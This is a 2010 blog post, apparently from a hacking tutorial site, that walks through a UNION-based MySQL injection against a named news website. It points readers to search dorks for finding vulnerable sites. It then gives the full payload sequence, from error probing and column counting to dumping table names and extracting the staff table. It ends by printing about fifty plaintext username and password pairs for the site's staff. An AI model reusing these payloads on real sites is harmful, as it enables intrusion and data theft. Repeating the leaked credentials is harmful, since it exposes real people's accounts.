Friday, 3 September 2010

Basic SQL Injection

Basic SQL Injection walkthrough with bizjournal.com as an example.(Not vulnerable Now)
You can find many vulnerable websites using this kind of dorks(click here for sql Injection dorks)

Code:
http://www.bizjournal.com/content/article.php?id=124
[Image: dwzzh2.jpg]

The first thing you'll do is point your browser to that site then add a tick at the end of it.

Code:
http://www.bizjournal.com/content/article.php?id=124'
[Image: 10ygyol.jpg]

Success! You will get the valuable SQL Error that your looking for.

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\' ORDER BY id ASC LIMIT 0, 1' at line 1

Now it is time to discover how many columns the database has.
The easiest way to do this is by using the "Order By" statement in SQL
There are many other ways to do this but, this is the way I use.
So to do it first you will put in the url and add this to the end "order by 1--"

Code:
http://www.bizjournal.com/content/article.php?id=124 order by 1--

You'll notice that the site loads normally, because it has 1 column in its database.
The next thing will be to make it a negative interger so that you don't get all of the fuzz from the site and make it cleaner to see what your doing.

http://www.bizjournal.com/content/article.php?id=-124 order by 1--

Notice it is a negative 124 now "-124"
[Image: 2lidhy8.jpg]

Now its time to find out just how many columns it has. You do this by increasing the order by number:

Code:
http://www.bizjournal.com/content/article.php?id=-124 order by 1--
http://www.bizjournal.com/content/article.php?id=-124 order by 2--
http://www.bizjournal.com/content/article.php?id=-124 order by 3--
http://www.bizjournal.com/content/article.php?id=-124 order by 4--
http://www.bizjournal.com/content/article.php?id=-124 order by 5--
http://www.bizjournal.com/content/article.php?id=-124 order by 6--
http://www.bizjournal.com/content/article.php?id=-124 order by 7--
http://www.bizjournal.com/content/article.php?id=-124 order by 8--
http://www.bizjournal.com/content/article.php?id=-124 order by 9--
http://www.bizjournal.com/content/article.php?id=-124 order by 10--
http://www.bizjournal.com/content/article.php?id=-124 order by 11--
[Image: 2mwywpg.jpg]
Success! it errors on "order by 11--" It does this because there aren't 11 columns in the database.
So now that we know we have only 10 columns we go into a new statement "UNION SELECT ALL".
This can be done a number of ways too but this is the way I do it.

Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,4,5,6,7,8,9,10--
[Image: 2hqxqmw.jpg]

What this does is searchs the database and returns which columns have data stored in them.
Notice that we have data stored in columns 2,3 and 4.
The next step will be to get the websites database version. We do this with a simple "@@version" in place of one of the numbers where data is stored, I will use 4.

Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,@@version,5,6,7,8,9,10--

This will return the database version in the site where the number 4 was located.
Our version is:
5.0.67-log

Next step is to get the table names, now this is where alot of the tutorials fall short, the so the simple:
from information_schema.tables--
This will not generate just the user created tables this will show you a bunch of garbage such as CHARACTER_SETS, COALLATIONS, etc...
What we will do is just add on to this code with:
from information_schema.tables WHERE table_schema=database()--

To make this work on site we need to use the statemenet "group_concat" to display the tables:
group_concat(table_name)

For columns:
group_concat(column_name)

Example:

Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(table_name),5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
[Image: 1zzt54.jpg]

Ahh now we have the user created table names:

Code:
archives,articles,articles2,digest,edition,events,links,nomination,sections,staf​f,survey

Now you need to look at the table names and decide which one would hold sensitive data, to me "staff" looks like a good choice.
So we will remember that for in a minute.

Next we will get the column names from the database with:
group_concat(column_name) from information_schema.columns where table_schema=database()--

[Image: 5d2kwo.jpg]

Code:
id,date,title,by,abstract,body,section,keywords,photo,id,date,title,author,abstr​act,body,section,keywords,
photo,caption,caption2,caption3,caption4,lead,id,date,title,author,abstract,body​,section,keywords,photo,
caption,caption2,caption3,caption4,lead,id,date,title,city,body,id,volume,number​,date,id,title,body,
month,day,year,date,time,time2,location,cost,contact,phone,email,url,approved,id​,url,title,category,
description,id,date,nominator,nominatortitle,nominatorcompany,nominatoraddress,n​ominatorcity,
nominatorstate,nominatorzip,nominatorphone,nominatorfax,nominatoremail,nomineeco​mpany,nomineeaddress,
nomineecity,nomineestate,nomineezip,nomineephone,nomineefax,nomineeweb,reason,re​asonother,sat1,sat2,sat3,
sat4,sat5,ethics1,ethics2,ethics3,ethics4,contrib1,contrib2,contrib3,contrib4,de​v1,dev2,dev3,dev4,dev5,
dev6,dev7,dev8,dev9,lead1,lead2,lead3,lead4,lead5,lead6,quality1,quality2,contac​t1name,contact1title,
contact1phone,contact1email,contact2name,contact2title,contact2phone,contact2ema​il,contact3name,
contact3title,c

Now you need to sift through these column names and find ones of interest to us. But what happens when you don't see a column like username or password?

Well sometime some of the columns will be cut off notice the "contact3title,c" at the end of the list.
Now its time to do a little guessing, this time its easier than most. username and password are both column names.

So to get check the columns we will use "group_concat" again but with our guessed column names and instead of:
from information_schema.tables where table_schema=database--
We will use:
from staff--
Remember I told you to remember the table name from earlier.

To give you an idea of what a wrong column name would look like it will look like this:
Note: 0x3a is the hex code for the colon ":"

Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10 from staff--

But we will try username and password this time.

Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from staff--
[Image: 2i75l3n.jpg]

Bingo! We have a short list of usernames and they arent even hashed:

Code:
ahudick:andyhudick1989
jcrooke:jeffcrooke1989
cpowell:blueridge
scousins:blueridge
rpastirik:2463589
dsmith:orange123
sgnau:texasgirl
llong:lorielong1989
rbelcher1:rodbelcher1989
rbelcher2:rodbelcher21989
staff:staff1989
ddilley:donnadilley1989
cmosley:catherine1989
scopeland:scopeland1989
pkrull:pkrull1989
gmarrano:gmarrano1989
akantor:akantor1989
scox:bizjournal1989
ccooper:bizjournal
jill.elswick@bizjournal.com:jelswick1989
SAnderson:blueridge
dprice:dprice1989
rhuff:rhuff1989
bhepler:bhepler1989
kferrell:kferrell1989
ebarber:ebarber1989
tfield:orange123
Kharsh:kharsh1989
ajohnson:bizjournal
dsimmons:dsimmons1989
jbugbee:jbugbee1989
jsnowman:jsnowman1989
mmandell:blueridge
mgeorge:blueridge1
mlong:mlong1989
roanoke:orange21
bdoughty:orange1980
mkeenan:nostaff
gfauber:blueridge1
sjacobson:blueridge1
seltzer:blueridge
quigley:blueridge
garrity:blueridge1
KKrumpelman:blueridge21
lwhite:orange1980
bgrubb:orange1980
AnneAdams:orange123
jwaugh:orange123
klitten:orange123

There you go that is the basics of MySQL injection, I really hope I helped you out, If I did then reply back with a thanks :)

0 comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...
Twitter Delicious Facebook Digg Stumbleupon Favorites More